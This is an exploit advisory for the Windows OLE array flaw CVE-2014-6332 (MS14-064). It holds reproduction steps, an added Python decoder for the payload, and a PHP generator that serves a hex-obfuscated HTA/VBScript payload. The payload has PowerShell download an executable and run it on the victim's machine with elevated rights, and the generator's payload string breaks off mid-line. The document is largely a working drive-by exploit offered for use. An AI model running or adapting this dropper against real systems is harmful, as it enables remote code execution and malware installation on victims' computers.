Microsoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064)
Document Title:
===============
Microsoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064)
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1576
Video: http://youtu.be/Vkswz7vt23M
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6332
CVE-ID:
=======
CVE-2014-6332
Release Date:
=============
2015-08-15
Vulnerability Laboratory ID (VL-ID):
====================================
1576
Common Vulnerability Scoring System:
====================================
9.3
Abstract Advisory Information:
==============================
The Vulnerability Laboratory published a proof of concept for a remote code execution vulnerability in Microsoft HTA (HTML Application) files (CVE-2014-6332, the OLE Automation array issue addressed by Microsoft bulletin MS14-064).
Vulnerability Disclosure Timeline:
==================================
2015-08-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1,
Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by
an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka Windows OLE Automation
Array Remote Code Execution Vulnerability.
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers who get a target user to open a crafted .hta file or visit a crafted web page; no privileged application user account is required on the target.
For a security demonstration, or to reproduce the vulnerability, follow the information and steps below.
Manual steps to reproduce ...
1 . Run the PHP script on the attacking host: php hta.php
2 . Copy the HTML the script prints and save it as poc.hta (replace the IP with the address of the host running the script)
3 . Open poc.hta on the target
4 . The HTA redirects to the PHP listener, which serves the VBScript payload; the payload downloads the executable from your link and runs it on the target
5 . Finished ;)
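The payload the listener serves is stored in the PHP script as one long string of "\xNN" escapes, which makes it hard to review what the dropper actually does before running the steps above. The following Python is an added example, not part of the advisory or of the PHP generator: it decodes such a blob and pulls out the observable behaviour (COM object created, download URL and dropped file name, launcher and ShellExecute verb). The sample input is an excerpt of the page's own $msgd string (the runmumaa() function), copied as it appears on the page; the helper names (decode_php_hex_string, extract_vbscript_blocks, summarize_dropper, summarize_payload) are mine, and the FILE_DOWNLOAD placeholder is what the generator is evidently meant to fill with $link.

```python
import re

# Excerpt of the advisory's own escaped $msgd payload (the runmumaa()
# dropper function and its closing </script>), copied from the PHP script
# as it appears on the page, including the "\ x0d" wrap artefacts that the
# copy picked up, so the decoder is exercised on exactly that input.
SAMPLE_ESCAPED = r'''
"\x0d\x0a\x3c\x53\x43\x52\x49\ x50\x54\x20\x4c\x41\x4e\x47\ x55\x41\x47\x45\x3d\x22\x56\ x42\x53\x63".
"\x72\x69\x70\x74\x22\x3e\x0d\ x0a\x0d\x0a\x66\x75\x6e\x63\ x74\x69\x6f\x6e\x20\x72\x75\ x6e\x6d\x75".
"\x6d\x61\x61\x28\x29\x20\x0d\ x0a\x4f\x6e\x20\x45\x72\x72\ x6f\x72\x20\x52\x65\x73\x75\ x6d\x65\x20".
"\x4e\x65\x78\x74\x0d\x0a\x73\ x65\x74\x20\x73\x68\x65\x6c\ x6c\x3d\x63\x72\x65\x61\x74\ x65\x6f\x62".
"\x6a\x65\x63\x74\x28\x22\x53\ x68\x65\x6c\x6c\x2e\x41\x70\ x70\x6c\x69\x63\x61\x74\x69\ x6f\x6e\x22".
"\x29\x0d\x0a\x63\x6f\x6d\x6d\ x61\x6e\x64\x3d\x22\x49\x6e\ x76\x6f\x6b\x65\x2d\x45\x78\ x70\x72\x65".
"\x73\x73\x69\x6f\x6e\x20\x24\ x28\x4e\x65\x77\x2d\x4f\x62\ x6a\x65\x63\x74\x20\x53\x79\ x73\x74\x65".
"\x6d\x2e\x4e\x65\x74\x2e\x57\ x65\x62\x43\x6c\x69\x65\x6e\ x74\x29\x2e\x44\x6f\x77\x6e\ x6c\x6f\x61".
"\x64\x46\x69\x6c\x65\x28\x27\ x46\x49\x4c\x45\x5f\x44\x4f\ x57\x4e\x4c\x4f\x41\x44\x27\ x2c\x27\x6c".
"\x6f\x61\x64\x2e\x65\x78\x65\ x27\x29\x3b\x24\x28\x4e\x65\ x77\x2d\x4f\x62\x6a\x65\x63\ x74\x20\x2d".
"\x63\x6f\x6d\x20\x53\x68\x65\ x6c\x6c\x2e\x41\x70\x70\x6c\ x69\x63\x61\x74\x69\x6f\x6e\ x29\x2e\x53".
"\x68\x65\x6c\x6c\x45\x78\x65\ x63\x75\x74\x65\x28\x27\x6c\ x6f\x61\x64\x2e\x65\x78\x65\ x27\x29\x3b".
"\x22\x0d\x0a\x73\x68\x65\x6c\ x6c\x2e\x53\x68\x65\x6c\x6c\ x45\x78\x65\x63\x75\x74\x65\ x20\x22\x70".
"\x6f\x77\x65\x72\x73\x68\x65\ x6c\x6c\x2e\x65\x78\x65\x22\ x2c\x20\x22\x2d\x43\x6f\x6d\ x6d\x61\x6e".
"\x64\x20\x22\x20\x26\x20\x63\ x6f\x6d\x6d\x61\x6e\x64\x2c\ x20\x22\x22\x2c\x20\x22\x72\ x75\x6e\x61".
"\x73\x22\x2c\x20\x30\x0d\x0a\ x65\x6e\x64\x20\x66\x75\x6e\ x63\x74\x69\x6f\x6e\x0d\x0a\ x3c\x2f\x73".
"\x63\x72\x69\x70\x74\x3e\x0d\ x0a\x20\x0d\x0a\x3c\x53\x43\ x52\x49\x50\x54\x20\x4c\x41\ x4e\x47\x55".
'''

# One PHP-style "\xNN" escape. Whitespace between the backslash and the x
# is tolerated because wrapped or pasted blobs often pick some up.
ESCAPE_RE = re.compile(r'\\\s*x([0-9a-fA-F]{2})')
SCRIPT_RE = re.compile(r'<script\s+language="vbscript"\s*>(.*?)</script>',
                       re.I | re.S)


def decode_php_hex_string(escaped: str) -> str:
    """Rebuild the text of a PHP string written entirely as \\xNN escapes.

    Only the escapes are interpreted; the quotes, concatenation dots and
    newlines of the surrounding PHP source are skipped."""
    raw = bytes(int(pair, 16) for pair in ESCAPE_RE.findall(escaped))
    return raw.decode('latin-1')


def extract_vbscript_blocks(html: str) -> list:
    """Return the bodies of all <SCRIPT LANGUAGE="VBScript"> blocks."""
    return [body.strip() for body in SCRIPT_RE.findall(html)]


def summarize_dropper(vbscript: str) -> dict:
    """Pull the observable behaviour out of a decoded dropper function:
    the COM object it instantiates, what it downloads and where it drops
    it, what it launches, and the ShellExecute verb ("runas" means the
    target sees a UAC elevation prompt)."""
    summary = {}
    m = re.search(r'createobject\("([^"]+)"\)', vbscript, re.I)
    if m:
        summary['com_object'] = m.group(1)
    m = re.search(r"DownloadFile\('([^']*)',\s*'([^']*)'\)", vbscript)
    if m:
        summary['download_url'] = m.group(1)
        summary['dropped_file'] = m.group(2)
    for line in vbscript.splitlines():
        # VBScript call syntax: obj.ShellExecute "file", "args", "dir", "verb", show
        if re.search(r'\bShellExecute\s+"', line):
            quoted = re.findall(r'"([^"]*)"', line)
            summary['launcher'] = quoted[0]
            summary['verb'] = quoted[-1]
    return summary


def summarize_payload(escaped: str) -> dict:
    """Decode an escaped payload and summarise its first VBScript block."""
    blocks = extract_vbscript_blocks(decode_php_hex_string(escaped))
    if not blocks:
        return {}
    return summarize_dropper(blocks[0])


if __name__ == '__main__':
    for key, value in summarize_payload(SAMPLE_ESCAPED).items():
        print(f'{key:13s} {value}')
```

Run against the excerpt, the summary shows the dropper creating Shell.Application, fetching FILE_DOWNLOAD to load.exe and launching powershell.exe with the runas verb, which is the behaviour to expect on the target once steps 1 to 4 are carried out. Point the same functions at the full $msgd string to review the second script block, which carries the actual array trigger.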
#!/usr/bin/php
<?php
# Title : Microsoft Windows HTA (HTML Application) - Remote Code Execution
# Tested on Windows 7 / Server 2008
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
#
#
# MS14-064
#
#
# 1 . Run the PHP script on the attacking host: php hta.php
# 2 . Copy the HTML the script prints and save it as poc.hta (replace the IP with the address of the host running the script)
# 3 . Open poc.hta on the target
# 4 . The HTA redirects to the listener below, which serves the VBScript payload; the payload downloads your link and runs it on the target
# 5 . Finished ;)
#
# Demo : http://youtu.be/Vkswz7vt23M
#
$port=80; # Listener port (binding to 80 needs root; the HTA's refresh URL below carries no port, so change both if you use another port)
$link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # URL of the exe the payload downloads and runs (PuTTY in the original)
print " Mohammad Reza Espargham\n\n\n";
$host= gethostname(); # local hostname ...
$ip = gethostbyname($host); # ... resolved to the IP the HTA will redirect to (replace it if this resolves to 127.0.0.1)
print "HTA code (save as poc.hta)\n".'<html><head><title> poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . '"></head></html>'."\n\n";
$reza = socket_create(AF_INET, SOCK_STREAM, SOL_TCP) or die('Failed to create socket!');
socket_bind($reza, '0.0.0.0', $port) or die('Failed to bind port ' . $port . ': ' . socket_strerror(socket_last_error()));
socket_listen($reza);
# Escaped HTML/VBScript payload served to the HTA once it redirects here. It
# decodes to an IE8-emulation page with two VBScript blocks: runmumaa(), the
# dropper that downloads FILE_DOWNLOAD to load.exe and launches it through
# powershell.exe with the "runas" verb, and the CVE-2014-6332 array trigger.
$msgd =
"\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x6d\x65\x74\x61\x20\x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76".
"\x3d\x22\x58\x2d\x55\x41\x2d\x43\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x22\x20\x63\x6f\x6e\x74\x65".
"\x6e\x74\x3d\x22\x49\x45\x3d\x45\x6d\x75\x6c\x61\x74\x65\x49\x45\x38\x22\x20\x3e\x0d\x0a\x3c\x68".
"\x65\x61\x64\x3e\x0d\x0a\x3c\x2f\x68\x65\x61\x64\x3e\x0d\x0a\x3c\x62\x6f\x64\x79\x3e\x0d\x0a\x20".
"\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47\x45\x3d\x22\x56\x42\x53\x63".
"\x72\x69\x70\x74\x22\x3e\x0d\x0a\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6e\x6d\x75".
"\x6d\x61\x61\x28\x29\x20\x0d\x0a\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20".
"\x4e\x65\x78\x74\x0d\x0a\x73\x65\x74\x20\x73\x68\x65\x6c\x6c\x3d\x63\x72\x65\x61\x74\x65\x6f\x62".
"\x6a\x65\x63\x74\x28\x22\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22".
"\x29\x0d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x3d\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x45\x78\x70\x72\x65".
"\x73\x73\x69\x6f\x6e\x20\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x53\x79\x73\x74\x65".
"\x6d\x2e\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61".
"\x64\x46\x69\x6c\x65\x28\x27\x46\x49\x4c\x45\x5f\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x27\x2c\x27\x6c".
"\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x2d".
"\x63\x6f\x6d\x20\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x29\x2e\x53".
"\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6c\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b".
"\x22\x0d\x0a\x73\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70".
"\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x2e\x65\x78\x65\x22\x2c\x20\x22\x2d\x43\x6f\x6d\x6d\x61\x6e".
"\x64\x20\x22\x20\x26\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x22\x22\x2c\x20\x22\x72\x75\x6e\x61".
"\x73\x22\x2c\x20\x30\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x3c\x2f\x73".
"\x63\x72\x69\x70\x74\x3e\x0d\x0a\x20\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55".
"\x41\x47\x45\x3d\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x20\x20\x0d\x0a\x64\x69\x6d".
"\x20\x20\x20\x61\x61\x28\x29\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x29\x0d\x0a\x64\x69\x6d".
"\x20\x20\x20\x61\x30\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x31\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61".
"\x32\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x33\x0d\x0a\x64\x69\x6d\x20\x20\x20\x77\x69\x6e\x39\x78".
"\x0d\x0a\x64\x69\x6d\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x0d\x0a\x64\x69\x6d\x20".
"\x20\x20\x72\x6e\x64\x61\x0d\x0a\x64\x69\x6d\x20\x20\x20\x66\x75\x6e\x63\x6c\x61\x73\x73\x0d\x0a".
"\x64\x69\x6d\x20\x20\x20\x6d\x79\x61\x72\x72\x61\x79\x0d\x0a\x20\x0d\x0a\x42\x65\x67\x69\x6e\x28".
"\x29\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x42\x65\x67\x69\x6e\x28\x29\x0d\x0a".
"\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a".
"\x20\x20\x69\x6e\x66\x6f\x3d\x4e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x55\x73\x65\x72\x41\x67\x65".
"\x6e\x74\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22".
"\x57\x69\x6e\x36\x34\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20".
"\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69".
"\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x20\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22".
"\x4d\x53\x49\x45\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x20\x0d\x0a\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x43\x49\x6e".
"\x74\x28\x4d\x69\x64\x28\x69\x6e\x66\x6f\x2c\x20\x49\x6e\x53\x74\x72\x28\x69\x6e\x66\x6f\x2c\x20".
"\x22\x4d\x53\x49\x45\x22\x29\x20\x2b\x20\x35\x2c\x20\x32\x29\x29\x20\x20\x20\x0d\x0a\x20\x20\x65".
"\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f".
"\x6e\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x65".
"\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x77\x69\x6e\x39\x78\x3d\x30\x0d\x0a\x20\x0d\x0a".
"\x20\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x49\x66\x20\x43\x72\x65\x61".
"\x74\x65\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61".
"\x72\x72\x61\x79\x3d\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68".
"\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30".
"\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72".
"\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61".
"\x72\x72\x61\x79\x3d\x6d\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68".
"\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28".
"\x30\x29\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f".
"\x6e\x3c\x34\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75".
"\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x62\x72\x3e\x20\x49\x45\x22\x29\x0d\x0a\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x69".
"\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6e".
"\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x20\x20\x0d\x0a\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29".
"\x0d\x0a\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69\x66\x0d".
"\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69".
"\x6f\x6e\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x20\x52\x61\x6e\x64\x6f".
"\x6d\x69\x7a\x65\x28\x29\x0d\x0a\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x61\x28\x35\x29\x0d\x0a".
"\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x62\x28\x35\x29\x0d\x0a\x20\x20\x20\x61\x30\x3d\x31\x33".
"\x2b\x31\x37\x2a\x72\x6e\x64\x28\x36\x29\x0d\x0a\x20\x20\x20\x61\x33\x3d\x37\x2b\x33\x2a\x72\x6e".
"\x64\x28\x35\x29\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66".
"\x75\x6e\x63\x74\x69\x6f\x6e\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0d\x0a\x20\x20\x4f\x6e\x20\x45".
"\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x64\x69\x6d\x20".
"\x69\x0d\x0a\x20\x20\x43\x72\x65\x61\x74\x65\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x46\x6f\x72".
"\x20\x69\x20\x3d\x20\x30\x20\x54\x6f\x20\x34\x30\x30\x0d\x0a\x20\x20\x20\x20\x49\x66\x20\x4f\x76".
"\x65\x72\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x43".
"\x72\x65\x61\x74\x65\x3d\x54\x72\x75\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20".
"\x46\x6f\x72\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x0d\x0a\x20\x20\x4e\x65\x78\x74".
"\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x73\x75\x62\x20\x74".
"\x65\x73\x74\x61\x61\x28\x29\x0d\x0a\x65\x6e\x64\x20\x73\x75\x62\x0d\x0a\x20\x0d\x0a\x66\x75\x6e".
"\x63\x74\x69\x6f\x6e\x20\x6d\x79\x64\x61\x74\x61\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45".
"\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20\x20\x69".
"\x3d\x74\x65\x73\x74\x61\x61\x0d\x0a\x20\x20\x20\x20\x20\